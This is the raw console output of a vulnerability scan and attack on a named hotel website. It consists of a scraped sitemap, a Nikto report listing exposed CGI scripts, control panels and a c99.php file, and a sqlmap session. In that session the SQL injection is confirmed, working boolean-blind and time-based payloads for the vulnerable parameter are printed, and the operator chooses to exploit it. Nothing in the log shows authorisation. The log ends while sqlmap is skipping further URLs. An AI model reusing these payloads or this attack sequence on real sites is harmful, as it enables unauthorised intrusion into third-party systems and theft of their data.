- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=12</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=9</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=14</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=11</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=15</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=18</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=10</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=13</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=23</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=33</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=32</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/solicitar.php?salon=Sol%20de%20Ica</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/solicitar.php?salon=Presidente%20Ay%20B</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/solicitar.php?salon=Presidente%20A</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/solicitar.php?salon=Presidente%20B</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/solicitar.php?salon=Pozo%20santo</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/solicitar.php?salon=Dunas</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/registrese.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/index.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/banner-full-day.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/ubicacion.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/responsabilidad-social.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/sitemap.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=1</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=8</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=9</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=1</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=1</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=27</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/tarifas.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=8</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=11</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=12</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=13</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=14</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=17</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=18</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes-request.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/eventos-salones.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/eventos-programas.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/cuestionario.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?pk_media_categoria=30</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?pk_media_categoria=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?pk_media_categoria=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?pk_media_categoria=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?pk_media_categoria=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?pk_media_categoria=39</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/informacion-turistica.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/compara.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/informacion-turistica-detalle.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/informacion-turistica-detalle-nazca.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/informacion-turistica-detalle-paracas.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=8</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=8</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=9</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=9</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=12</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=9</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=14</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=11</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=15</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=18</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=10</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=13</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=23</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=33</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=32</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/solicitar.php?salon=Sol%20de%20Ica</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/solicitar.php?salon=Presidente%20Ay%20B</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/solicitar.php?salon=Presidente%20A</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/solicitar.php?salon=Presidente%20B</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/solicitar.php?salon=Pozo%20santo</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/solicitar.php?salon=Dunas</loc>
- <changefreq>always</changefreq>
- </url>
- </urlset>
- + -- --=[Checking cookie attributes on www.lasdunashotel.com...
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.185.26.214
- + Target Hostname: www.lasdunashotel.com
- + Target Port: 80
- + Start Time: 2015-09-29 12:24:49 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: nginx/1.8.0
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
- + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
- + /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
- + /securecontrolpanel/: Web Server Control Panel
- + /webmail/: Web based mail package installed.
- + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
- + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
- + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
- + OSVDB-2117: /cpanel/: Web-based control panel
- + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
- + OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
- + OSVDB-3268: /includes/: Directory indexing found.
- + OSVDB-3092: /includes/: This might be interesting...
- + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
- + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
- + OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3268: /images/: Directory indexing found.
- + OSVDB-3268: /style/: Directory indexing found.
- + OSVDB-6694: /.DS_Store: Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.
- + /controlpanel/: Admin login page/section found.
- + Server leaks inodes via ETags, header found with file /cgi-sys/c99.php, fields: 0x54643954 0x875e
- + 8634 requests: 0 error(s) and 25 item(s) reported on remote host
- + End Time: 2015-09-29 13:26:36 (GMT-4) (3707 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- _______________________________________________________________
- __ _______ _____
- \ \ / / __ \ / ____|
- \ \ /\ / /| |__) | (___ ___ __ _ _ __
- \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
- \ /\ / | | ____) | (__| (_| | | | |
- \/ \/ |_| |_____/ \___|\__,_|_| |_|
- WordPress Security Scanner by the WPScan Team
- Version 2.8
- Sponsored by Sucuri - https://sucuri.net
- @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
- _______________________________________________________________
- [!] [!] The remote website is up, but does not seem to be running WordPress.
- [ERROR] Website Unreachable: http://www.lasdunashotel.com
- _
- ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150928}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 13:27:16
- do you want to check for the existence of site's sitemap(.xml) [y/N] n
- [13:27:16] [INFO] starting crawler
- [13:27:16] [INFO] searching for links with depth 1
- [13:27:28] [INFO] searching for links with depth 2
- please enter number of threads? [Enter for 1 (current)] 1
- [13:27:28] [WARNING] running in a single-thread mode. This could take a while
- [13:27:33] [INFO] 5/17 links visited (29%)
- sqlmap got a 301 redirect to 'http://www.lasdunashotel.com/en/'. Do you want to follow? [Y/n] Y
- [13:27:46] [INFO] searching for links with depth 3
- please enter number of threads? [Enter for 1 (current)] 1
- [13:27:46] [WARNING] running in a single-thread mode. This could take a while
- [13:29:07] [INFO] searching for links with depth 4
- please enter number of threads? [Enter for 1 (current)] 1
- [13:29:07] [WARNING] running in a single-thread mode. This could take a while
- [13:31:47] [INFO] searching for links with depth 5
- please enter number of threads? [Enter for 1 (current)] 1
- [13:31:47] [WARNING] running in a single-thread mode. This could take a while
- do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] N
- [13:33:06] [INFO] sqlmap got a total of 181 targets
- URL 1:
- GET http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=73&pk_habitacion=
- do you want to test this URL? [Y/n/q]
- > Y
- [13:33:06] [INFO] testing URL 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=73&pk_habitacion='
- [13:33:06] [INFO] using '/root/.sqlmap/output/results-09292015_0133pm.csv' as the CSV results file in multiple targets mode
- [13:33:07] [INFO] testing connection to the target URL
- [13:33:10] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
- do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] N
- [13:33:10] [INFO] testing if the target URL is stable
- [13:33:10] [INFO] target URL is stable
- [13:33:10] [INFO] testing if GET parameter 'pk_paquete_especial' is dynamic
- [13:33:11] [WARNING] GET parameter 'pk_paquete_especial' does not appear dynamic
- [13:33:13] [INFO] heuristics detected web page charset 'ascii'
- [13:33:13] [INFO] heuristic (basic) test shows that GET parameter 'pk_paquete_especial' might be injectable (possible DBMS: 'MySQL')
- [13:33:13] [INFO] heuristic (XSS) test shows that GET parameter 'pk_paquete_especial' might be vulnerable to XSS attacks
- [13:33:13] [INFO] testing for SQL injection on GET parameter 'pk_paquete_especial'
- it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
- for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
- [13:33:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [13:33:23] [WARNING] reflective value(s) found and filtering out
- [13:33:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
- [13:34:47] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
- [13:35:22] [INFO] GET parameter 'pk_paquete_especial' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
- [13:35:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
- [13:35:22] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
- [13:35:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
- [13:35:23] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
- [13:35:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
- [13:35:24] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
- [13:35:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
- [13:35:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
- [13:35:25] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
- [13:35:41] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
- [13:35:41] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
- [13:35:41] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
- [13:35:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
- [13:35:42] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
- [13:35:42] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
- [13:35:42] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
- [13:35:42] [INFO] testing 'MySQL inline queries'
- [13:35:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
- [13:35:42] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
- [13:35:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
- [13:35:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
- [13:35:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [13:35:46] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
- [13:35:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
- [13:35:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
- [13:35:48] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
- [13:35:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
- [13:35:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
- [13:36:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
- [13:36:23] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
- [13:36:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
- [13:36:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
- [13:37:28] [INFO] GET parameter 'pk_paquete_especial' seems to be 'MySQL >= 5.0.12 OR time-based blind (comment)' injectable
- [13:37:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
- [13:37:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
- [13:37:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
- [13:37:48] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
- [13:38:18] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
- [13:38:30] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
- [13:38:44] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
- [13:38:53] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
- [13:39:14] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
- [13:39:27] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
- [13:39:52] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
- [13:39:59] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
- [13:40:09] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
- [13:40:09] [INFO] checking if the injection point on GET parameter 'pk_paquete_especial' is a false positive
- GET parameter 'pk_paquete_especial' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
- sqlmap identified the following injection point(s) with a total of 351 HTTP(s) requests:
- ---
- Parameter: pk_paquete_especial (GET)
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: pk_paquete_especial=-3704' OR 4770=4770#&pk_habitacion=
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 OR time-based blind (comment)
- Payload: pk_paquete_especial=73' OR SLEEP(5)#&pk_habitacion=
- ---
- do you want to exploit this SQL injection? [Y/n] Y
- [13:40:18] [INFO] testing MySQL
- [13:40:20] [INFO] confirming MySQL
- [13:40:22] [INFO] the back-end DBMS is MySQL
- [13:40:22] [INFO] actively fingerprinting MySQL
- [13:40:23] [INFO] executing MySQL comment injection fingerprint
- web application technology: Nginx
- back-end DBMS: active fingerprint: MySQL >= 5.5.0
- html error message fingerprint: MySQL
- [13:40:55] [WARNING] HTTP error codes detected during run:
- 406 (Not Acceptable) - 214 times
- SQL injection vulnerability has already been detected against 'www.lasdunashotel.com'. Do you want to skip further tests involving it? [Y/n] Y
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/www.lasdunashotel.com/paquetes.php?pk_habitacion= '
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=8'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=11'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=12'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=13'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=17'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=18'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=21'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=22'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/servicios_detalle.php?pk_hotel_servicio=23'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/www.lasdunashotel.com/paquetes.php?pk_habitacion= '
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=1#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=2#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=3#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=4#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=5#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=6#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=7#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=8#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=9#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=1'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/www.lasdunashotel.com/paquetes.php?pk_habitacion= '
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=75&pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=33&pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=34&pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=64&pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=46&pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=6'
